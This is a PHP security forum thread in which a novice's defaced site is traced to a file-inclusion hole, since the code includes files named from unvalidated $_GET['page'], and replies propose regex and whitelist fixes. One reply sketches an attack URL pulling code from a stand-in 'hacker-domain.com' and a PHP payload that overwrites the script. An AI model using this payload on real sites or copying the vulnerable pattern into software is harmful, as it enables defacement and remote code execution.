PHP Exploit BUT HOW?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
110%Nutter
Forum Newbie
Posts: 2
Joined: Tue Aug 11, 2009 2:33 pm

PHP Exploit BUT HOW?

Post by 110%Nutter »

Hi, I went to look at my website last night and found that my homepage had been replaced by something created by some muslim albanian / kosovo hackers.

I would be interested in hearing from any of you who could pin point the weak spot in my code, I'm pretty new to php so its likely there are some newbie errors in it that let them in!!

Hope to hear from someone soon!!

Code: Select all

 
<?php
    //loop through the files and see whats there
    $exts = array("php","htm","html");
    $got = 0;
    $folder = "/home/rayj/public_html/pages/";
    if ($_GET["page"] == "") $_GET["page"] = "home/home";
    $page = $folder . $_GET["page"];
    foreach ($exts as $ext) {
        if (file_exists($page . "." . $ext)) {
            $got = $page . "." . $ext;
            break;
        }
    }
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>Chris Ray | <?php
        // read the title file and use its contents to name the page
        if (!$got) {
            echo "Page not found...";
        } else if (file_exists($page . ".title")) {
            include ($page . ".title");
        } else {
            echo $_GET["page"];
        }
    ?></title>
    
    <?php
    //include java script files
        if (file_exists($page . ".js")) {
            echo "<script language=\"javascript\">";
            include ($page . ".js");
            echo "</script>";
        }
    ?>
    
    <?php
    //include meta data files
        if (file_exists($page . ".meta")) {
            include ($page . ".meta");
        }
    ?>
    
    <link href="stylesheet.css" rel="stylesheet" type="text/css"/>
    <link rel="shortcut icon" href="assets/favicon.ico"/>
    <link rel="stylesheet" href="assets/cbcscbindex.css" type="text/css" /> 
</head>
<body>
    <div id="top_bg">           
        </div>
        <div id="menu">
            <div id="menu_items">
                <ul id="ebul_cbindex_3" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=services/raid_calculator/raid_calculator" title="">Raid Calculator</a></li>
                    <li><a href="?page=services/web_hosting/web_hosting" title="">Web Hosting</a></li>
                </ul>           
                <ul id="ebul_cbindex_4" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=about_me/me/me" title="">Me</a></li>
                    <li><a href="?page=about_me/get_in_touch/get_in_touch" title="">Get In Touch</a></li>
                </ul>
                <ul id="cbindexebul_table" class="cbindexebul_menulist" style="width: 350px; height: 30px;">
                    <li class="spaced_li"><a href="?page=home/home"><img id="cbi_cbindex_1" src="assets/ebbtcbindex1_0.png" name="ebbcbindex_1" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Home" title="" /></a></li>
                    <li class="spaced_li"><a href="?page=projects/projects"><img id="cbi_cbindex_2" src="assets/ebbtcbindex2_0.png" name="ebbcbindex_2" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Projects" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_3" src="assets/ebbtcbindex3_0.png" name="ebbcbindex_3" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Services" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_4" src="assets/ebbtcbindex4_0.png" name="ebbcbindex_4" width="70" height="30" style="vertical-align: bottom;" border="0" alt="About Me" title="" /></a></li>
                    <li><a href="?page=uni/uni"><img id="cbi_cbindex_5" src="assets/ebbtcbindex5_0.png" name="ebbcbindex_5" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Uni" title="" /></a></li>
                </ul><!-- number 7 test when page missing show error message-->
                <script type="text/javascript" src="assets/cbjscbindex.js"></script>
            </div>
        </div>
        <div id="middle_bg">
            <div id="content">
                <?php
                    if (!$got) {
                        echo "Page not found...";
                    } else {
                        include($got);
                    }
                ?>
            </div>
        <div id="footer">
            <p>Designed by Chris Ray &copy; 2009 <a href="http://validator.w3.org/check?uri=http%3A%2F%2Fwww.rayjchris.co.uk%2F">XHTML</a> | <a href="http://jigsaw.w3.org/css-validator/validator?uri=www.rayjchris.co.uk&profile=css21&usermedium=all&warning=1">CSS</a></p>
        </div>  
    </div>          
    <div id="bottom_bg">
    </div>
</body>
</html>
 
User avatar
tr0gd0rr
Forum Contributor
Posts: 305
Joined: Thu May 11, 2006 8:58 pm
Location: Utah, USA

Re: PHP Exploit BUT HOW?

Post by tr0gd0rr »

You are including a file with a name based on unscrubbed content in $_GET in the "include($got)" line.

I'm not exactly sure, but I think you can do something like:
http:// domain.com/?page=../../../../http://hacker-domain.com/exploiter.txt

Where exploter.txt contains something like the following:

Code: Select all

<?php
$php = '<?php echo "pwnd" ?>';
file_put_contents($_SERVER['SCRIPT_FILENAME'], $php);
You should never include files or perform exec() based on unscrubbed user-submitted content.

You could probably run a preg_match() to ensure that $_GET['page'] contains only letters, numbers, slashes for example.

You could also check that the page is within your specified directory (untested):

Code: Select all

$safe = false;
$dirname = rtrim($got, '/');
while (($dirname = dirname($dirname)) {
  if ($dirname == $folder) {
    $safe = true;
    break;
  }
}
if (!$safe) {
 $got = $folder . '404.php';
}
110%Nutter
Forum Newbie
Posts: 2
Joined: Tue Aug 11, 2009 2:33 pm

Re: PHP Exploit BUT HOW?

Post by 110%Nutter »

You had an interesting theory i gave the ?page=../../ a test but that was stopped with the following error

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/home/rayj/public_html/pages

Lines 2 to 15 in my code do something similar to the file location existence checking you were talking about, I'm not sure if yours takes that idea one step further? would it be worth adding them together?

could you give me an example of preg_match?

Thanks for your help!!
User avatar
tr0gd0rr
Forum Contributor
Posts: 305
Joined: Thu May 11, 2006 8:58 pm
Location: Utah, USA

Re: PHP Exploit BUT HOW?

Post by tr0gd0rr »

ah yes--open_basedir

The regex would be something like:

Code: Select all

if (preg_match('~[^\w/_-]~', $page)) {
  // not safe
}
 
 
And yes, file_exists will ensure that the file exists, but it will not ensure that the file is within your base directory.

I'll look into some other possible exploits; this is interesting.
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: PHP Exploit BUT HOW?

Post by kaisellgren »

You probably got some other vulnerable scripts there, too. Easiest way to safely include files like that would be to use white listing:

Code: Select all

$files = array('home.php','contact.php');
if (!in_array($_GET['page'],$files))
 include('404.php');
else
 include($_GET['page']);
No one can now manipulate your inclusions.
Post Reply